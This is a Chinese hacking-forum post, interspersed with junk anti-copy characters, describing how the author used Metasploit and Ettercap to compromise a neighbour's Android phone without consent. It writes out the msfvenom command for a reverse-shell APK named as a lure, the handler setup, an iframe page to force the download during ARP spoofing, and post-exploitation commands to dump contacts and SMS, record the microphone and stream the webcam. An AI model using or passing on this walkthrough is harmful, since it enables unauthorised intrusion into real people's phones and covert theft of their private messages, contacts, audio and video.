找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1819|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ k; Q. v* f3 l6 a0 b 五、msf+ettercap入侵邻居安卓手机 + c% ]- Y+ N6 x4 X3 \) y$ @1 d5 ?

' Y t" p5 U4 T2 c) g! z

# o9 V& u* N& ?: \ 首先启动msf 1 T6 ~2 u$ K5 `

0 E; b+ _2 S- H& Z& C

! K6 j8 j2 i* p0 F- g 先用kali生成一个安卓木马,如下命令: 8 }6 Y2 i" o; w; s/ o* M

* W7 m- o. O% t- C- l# O, h" x' A

, h3 [/ w0 v( ] Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk % C3 e# N5 K1 S) ~* B7 t

& c" R$ n# _: I9 d" m

: x) m* p3 H' ^ E+ K 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 / x6 _0 Y& `5 H# S

! \5 B% _' k7 m

. b& s& s8 \0 N7 }1 k# D 然后进入msf / g [ @! p7 d1 f7 R

; K9 a8 T% ~4 [' M

- f9 v0 W) \& _8 M use exploit/multi/handler 0 a0 K" I/ v. V6 |' b' i8 ]

5 L9 A& h/ K% ~/ D8 a

4 e, }1 b: y( B- L1 i: {4 s4 S set payload android/meterpreter/reverse_tcp , \6 M! d; t& `+ d% t/ S1 K6 [2 R

' i+ X3 d# e; J; J1 c" X- B) t4 S

8 H% M1 R5 `6 ]0 a set LHOST 192.168.0.109 //ipkailiip ' h. i+ U; ~7 x' P" v

1 M9 p* Y1 \$ Q/ Z- v

P0 ~ X" n4 p$ ?5 j7 x, d9 o set LPORT 44444 //端口一定要与前面生成的木马的端口一致 - @! \3 u# z+ e+ D3 x. |7 r- ]% P

& z/ D6 u; t# O8 B% c, N

$ }' [4 o9 ?" o: w' ~( a7 u% w3 n Exploit # ^# Q, g) M1 X% r1 ?& \' b+ f+ X

# u# i) ?3 i) ~6 j" \9 b

6 C9 U0 |$ B( e, ]   ; t) w: {- h/ e- M7 f

* z( a, O5 q+ Q

9 G; ~% U/ p d- K% R$ v 下面我们开启ettercap -G . H8 W! ~5 D- F' ?

4 H; i; Y2 h' T& T' s* c

" @, _% b# Y# ?" l* c: j ~6 z 我物理IP $ k6 V1 p- ?% M( P9 H$ ?

& G z8 x! u/ E& J

# r: Y1 W3 f3 C9 o4 |   0 m. ^ e* W5 H# k6 A1 l |

+ U+ q0 _7 J. l7 f. _1 I7 F

# N% w( L" j8 P; K2 H 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 5 ]8 U8 d% A$ [

( ~$ u$ R# E1 N# w% ?; y

1 v' Q! l" o( e 下面我们来设置一下 - U; N3 D6 F P) y: [

2 N$ {# U( @1 Q) J# M2 Z; h. }

& D7 \% r9 u/ ]6 J) l- S3 ^   / j2 K. |, C1 a' ~/ E) r

* f' R4 `7 w. ~+ l7 _

m$ P1 {* A( g1 d7 o 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 9 R2 c8 _$ c; K! j4 m/ I6 k

, _8 d* K- D0 |. Y3 ]; p W, }

3 g% m: u' I$ c* N6 f7 x8 F4 W* q   1 T3 g- O4 P7 z( g2 A

7 |" R7 o: q k! f( H* L9 K

/ U% \# P- _* I0 L' k1 }2 `9 S   ) j$ D9 h8 W" p0 i. \

+ C4 E0 R8 r2 [& j9 R% M- }' b

2 k2 G, c# {9 e' R3 i3 H( l8 [   1 l" i" e4 |& n9 H

" p, R& ~- a8 U& ^2 F

5 s: p$ o- E5 C; b3 C7 I c( ]1 w   6 {! W+ h" o. R h [2 O) L# s

' p b% p$ }+ h, p

! u. [1 v4 s) ^ y   3 h0 a+ b, |5 d2 ` Z

" s/ R4 Z0 p* r5 v1 _: R

* J# a( V5 A' a7 G3 K   ( C4 V% T/ b/ m: e4 t. R

$ }( e$ p g8 M& w6 i# _( J

. P k! r9 a' {% q8 s' R; h& x   7 p* n3 t; e% }

0 k( X W& C# k- j/ {. w: y, {/ e4 V

# @/ h* q, q3 k- |: t5 M: {   1 O, B$ y! N* s9 B3 p

- Z$ o' p1 J7 P: ?1 d

; f6 b' a" \! X/ r U   : t3 s, l3 _/ b j, S5 c; Z

/ V0 U1 t- i% w: d$ h: i7 |

% z5 K( w1 [; R1 T   9 E5 H, V$ T. z k" P, B" v

1 @6 y( F2 f$ _/ L, v6 w* I* ^

7 n2 p/ m# h" R+ t! b   7 Q' j& y0 e- m( [) O7 e

( R( \$ M( \/ R; E- R; p

7 {8 A* ~- t" I: Z) v   3 s$ `* s* i* q" S

' l1 W$ D2 i& L# ?' @9 a

3 l! x% I8 C" F: U/ ]: w# M" j   " B2 c6 b/ a9 a! h9 Q

% F8 p1 {# ^5 g P7 ~ Z

+ D# `9 P2 B5 U, ] 下面我们开始攻击 / Y* Z/ y; F$ |+ v9 v7 n

8 v0 P u2 G+ l& D8 {! n

4 b) y' E# s5 u" \/ Q7 A: \   . J% D1 }# [1 r2 ?( Q5 o) f- p+ n

& g2 c* V" d9 `( z0 l

" L) F( `: u) w; k( `+ P8 v   ) G, I! [+ Y" w

4 E6 `+ B( w5 n/ `

& L7 f* \8 A2 [. R6 @; P   - M. `- w- G/ k3 p0 v. H ]2 {

: v: S% x3 ~# m1 a H5 k" e c" }

' y) S& H0 H i, A* q6 B |   * e3 o) c5 _. ~4 ]1 _

" D* v" M+ V4 A a( S( E" J

# \% ^3 S: p2 Q% ]   ) W9 V' L% x, I

* v/ C' w: I9 q' }( @( z$ d& Y

& l; n. L* q2 u7 ]3 W 大概过了5分钟多,发现反弹成功了 : w/ n" H2 ]3 B& Y5 u) u8 C

+ ^5 i8 m0 M. z$ F

% y8 I7 g0 u( K7 a% t4 I   : t- Y8 ^, z, S* p+ }5 t9 h

. c& M1 Z; \3 O! b5 ]

$ B5 ~0 `6 X; c. m. Z/ M: N- h0 |   ( ?- R) h9 |9 o$ b$ k$ `

' E8 a! |' i0 Z' t, W: f

2 ~+ ~* h" p( m4 s   % n: c" }/ q- s( n X: ?# X* }

/ H8 @/ j3 N5 u4 V" _

1 V9 d: P+ h' H- e [3 ?! E: }   , Z0 a. [' g& H: z

& G; t0 a, T/ K) O$ i8 w

V0 J) F6 H6 Q   ( C% J, u; n e; @: H! w

0 z; w: w% G! s" r

# H2 {8 H' D; K1 A0 F$ ~   9 y% @! i! ]6 H/ l. J* m

/ w% p. F3 P, Y* l( x$ r8 Q/ S8 D' Z

8 y* y, C5 P3 x- E% p6 S, R   . ~; ?) z7 H- v4 J" r( W

9 E( s V. ^4 B& e4 M9 l" H

* e, _! z6 f( n2 z( v& k 执行命令 q$ I1 F1 j, f0 K% S; H

! V" J U$ X. N! L8 s6 ]" r

, i/ h' r3 [) M1 h: i1 i* Z   z( r m$ m! y( c3 X" f! N7 H

$ k& q8 Q) k' k

5 Q! _/ ^" b" K4 {6 t9 e! V dump_contacts    --》这个是导出电话 8 V9 F8 v f' q

9 D+ [& G: E+ Y. \1 a

! Q0 _. n4 y4 p8 k/ K dump_sms --》这个是导出信息 . a1 l; e' S6 I. t0 V: I

' C% R4 r4 z) N$ z

- Y% {! I9 R; M% i6 N7 S, @( }# D5 `7 F6 N record_mic     Record audio from the default microphone for X seconds 6 i) A& R4 G- Q5 D9 h

: h% j$ S& E1 g& ~

( A% r, z. D4 c     webcam_chat    Start a video chat , L" D0 w G8 B& v' I4 A4 j3 H

8 o7 c) \9 Y5 U: o# ]

5 G3 L* L, Z6 t! G& f$ T% g3 o     webcam_list    List webcams $ |) J7 q9 p2 Z& t+ U

. [$ p9 z h6 w" R+ D" m9 p

1 ?$ r% {( U' R- A* f. I0 `     webcam_snap    Take a snapshot from the specified webcam - D$ ~# u0 c; P

0 n9 _. q; g& _% z

9 x" z/ q2 F9 g2 k7 p) B/ f webcam_stream  lay a video stream from the specified webcam 8 a+ \( f9 B3 v( o

+ b' Y3 v; m) [+ x) x6 G. t

, K( Z, s; E+ u9 e( f+ x   + P6 b$ o( e$ P9 |8 Y" k0 ~

0 `) g2 D5 ~$ {& K

8 r& F9 G2 P( n( p( P% Z   " H/ t/ v' J6 X. J5 d

+ u% J$ f* s5 B: t/ [

1 ?; v+ |; d8 o9 N! Z. h 我们打开看一下电话薄, 4 x. o0 W- b* h0 K; C- P8 Z

$ o4 ]6 `- p# y& |0 q7 m. N% }: c$ P

; z: l# X7 H) b2 \   4 s+ }. \! o s& {, q

1 N( M1 I( D0 w5 ^

5 W! A% m0 j9 h% ?# d3 b- Q   % \. H) Q+ s+ O9 h) H; [

: w6 K& w! {% Q. a

( X' n/ t9 z2 ?# p1 _6 `$ J   & @+ W* a; Z" t+ d) s$ f3 {7 X3 M3 R

: Y3 |6 j* F0 r; I

w) R. x/ T! z1 r% \5 G* L$ e   0 L M) s+ r7 O; O

" m2 c6 I, R+ I" \6 \! E

9 W, y `; W! j- u" N' M- [( X   2 u- r( Z# B' J7 J! A ]

- O$ g7 h; X( k3 O8 s" @

# O; o9 C$ ]8 K1 S0 x8 P   1 |, L6 S% |3 q2 r' J, L: T

?' w+ D, l& u

_9 A N! n) {: r 我们同时欺骗成DroidJack木马,使用方法如图: : C6 @, q- ?' d3 e( j- q# p

8 j5 q3 X j! u$ U& Z7 [" v& {

, c! d$ F; M' r! a# f, A   . s. P7 l8 T4 V" c4 ~" D' F" G

6 R6 A" d/ g% r+ {* o$ y

7 m- N$ B6 D; k9 T% a) h5 H   0 k5 p( Q# ]. k7 R8 H7 _. X

! k8 d9 O% s: `* `6 O, }

$ O" t) l+ ^6 n. Y1 b   - y1 s( J0 z( s7 V( `

+ S) {2 \2 U& o0 q2 O

! x) |! z- A6 w2 h) `, f2 t 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 X+ }1 f3 K5 }; P

4 w/ Z6 c# \6 d

. E" K" f2 O* t6 }% U! s   0 K ^) P$ Y w& e* a

* C( N8 w$ g0 K+ g& D

5 ?! _+ K. ` T+ r$ y, @, M   ) T+ w$ l! r9 w K& U* d; {) c

+ z* I9 v3 ?0 p; }$ q& R+ a9 V6 f

) }$ S4 f7 m; d: A: W   " X& I1 G$ p3 \+ v6 h `7 j

- j8 v/ w0 d) O0 a" w" T

9 E4 N! [; g5 j4 q: i $ Y, n7 v1 P3 ` {; s% s

9 W9 G& B \6 d2 M6 ~

/ U6 q! [8 ]+ M, k# O
* _, x u5 m# ^/ M1 q+ l

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表